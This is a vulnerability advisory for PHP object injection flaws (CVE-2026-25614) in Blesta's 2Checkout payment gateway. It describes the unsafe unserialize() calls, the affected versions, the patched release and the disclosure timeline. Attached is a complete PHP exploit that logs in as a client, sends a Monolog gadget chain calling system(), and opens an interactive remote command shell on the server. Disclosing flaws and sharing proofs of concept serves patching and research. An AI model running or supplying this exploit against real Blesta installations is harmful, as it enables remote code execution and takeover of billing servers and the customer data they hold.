--------------------------------------------------------------------------
Blesta <= 5.13.1 (2Checkout) Multiple PHP Object Injection Vulnerabilities
--------------------------------------------------------------------------


[-] Software Link:

https://www.blesta.com


[-] Affected Versions:

All versions from 3.0.0 to 5.13.1.


[-] Vulnerabilities Description:

The vulnerabilities exist because user input passed through the
"invoices" POST parameter or the "item-ext-ref" GET parameter when
dispatching the Checkout2::validate() or Checkout2::success() method
is not properly sanitized before being used in a call to the
unserialize() PHP function. This can be exploited by malicious client
users to inject arbitrary PHP objects into the application scope,
allowing them to perform a variety of attacks, such as executing
arbitrary PHP code (RCE).

Successful exploitation of this issue requires the 2Checkout payment
gateway to be installed.


[-] Proof of Concept:

https://karmainsecurity.com/pocs/CVE-2026-25614.php


[-] Solution:

Apply the vendor patch or upgrade to version 5.13.2 or later.


[-] Disclosure Timeline:

[19/01/2026] - Vendor notified

[22/01/2026] - CVE identifier requested

[28/01/2026] - Version 5.13.2 released

[31/01/2026] - Version 5.13.3 released to address regressions
introduced in 5.13.2

[03/02/2026] - CVE identifier assigned

[04/02/2026] - Public disclosure


[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.org) has
assigned the name CVE-2026-25614 to these vulnerabilities.


[-] Credits:

Vulnerabilities discovered by Egidio Romano.


[-] Other References:

https://www.blesta.com/2026/01/28/security-advisory/


[-] Original Advisory:

https://karmainsecurity.com/KIS-2026-03


--- packet storm attached poc: ---
<?php

/*
    --------------------------------------------------------------------------
    Blesta <= 5.13.1 (2Checkout) Multiple PHP Object Injection Vulnerabilities
    --------------------------------------------------------------------------
    
    author..............: Egidio Romano aka EgiX
    mail................: n0b0d13s[at]gmail[dot]com
    software link.......: https://www.blesta.com
    
    +-------------------------------------------------------------------------+
    | This proof of concept code was written for educational purpose only.    |
    | Use it at your own risk. Author will be not responsible for any damage. |
    +-------------------------------------------------------------------------+
    
    [-] Original Advisory:

    https://karmainsecurity.com/KIS-2026-03
*/

set_time_limit(0);
error_reporting(E_ERROR);

print "\n+-------------------------------------------------------------------+";
print "\n| Blesta <= 5.13.1 (2Checkout) PHP Object Injection Exploit by EgiX |";
print "\n+-------------------------------------------------------------------+\n";

if (!extension_loaded("curl")) die("\n[-] cURL extension required!\n\n");

if ($argc != 4)
{
	print "\nUsage......: php $argv[0] <URL> <Username> <Password>\n";
	print "\nExample....: php $argv[0] http://localhost/blesta/ egix password";
	print "\nExample....: php $argv[0] https://www.blesta.com/ hacker pwned\n\n";
	die();
}

class Monolog_Handler_SyslogUdpHandler
{
        protected $socket;

        function __construct($x)
        {
            $this->socket = $x;
        }
}

class Monolog_Handler_BufferHandler
{
        protected $handler;
        protected $bufferSize = -1;
        protected $buffer;
        protected $level = null;
        protected $initialized = true;
        protected $bufferLimit = -1;
        protected $processors;

        function __construct($methods, $command)
        {
            $this->processors = $methods;
            $this->buffer = [$command];
            $this->handler = $this;
        }
}

function exec_cmd($cmd)
{
	global $ch, $url, $token;
	
	$cmd .= "; echo CMDDELIM";
	$chain = new Monolog_Handler_SyslogUdpHandler(new Monolog_Handler_BufferHandler(['current', 'system'], [$cmd, 'level' => null]));
	$chain = base64_encode(str_replace('_', '\\', serialize($chain)));
	
	curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(["invoices" => $chain]));
	
	return curl_exec($ch);
}

$url  = $argv[1];
$user = $argv[2];
$pwd  = $argv[3];
$ch   = curl_init();

@unlink("./cookies.txt");

curl_setopt($ch, CURLOPT_URL, "{$url}client/login/");
curl_setopt($ch, CURLOPT_COOKIEJAR, "./cookies.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "./cookies.txt");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
//curl_setopt($ch, CURLOPT_PROXY, 'http://127.0.0.1:8080');

print "\n[+] Performing client login with username '{$user}' and password '{$pwd}'\n";

if (!preg_match('/"_csrf_token" value="([^"]+)/i', curl_exec($ch), $token)) die("[-] CSRF token not found!\n\n");

curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(["_csrf_token" => $token[1], "username" => $user, "password" => $pwd]));

if (preg_match('/alert-danger/i', curl_exec($ch))) die("[-] Login failed!\n\n");

print "[+] Launching shell\n";

curl_setopt($ch, CURLOPT_URL, "{$url}client_pay/received/checkout2");
	
while(1)
{
	print "\nblesta-shell# ";
	if (($cmd = trim(fgets(STDIN))) == "exit") break;
	preg_match('/(.*)CMDDELIM/s', exec_cmd($cmd), $m) ? print $m[1] : die("\n[-] Exploit failed!\n\n");
}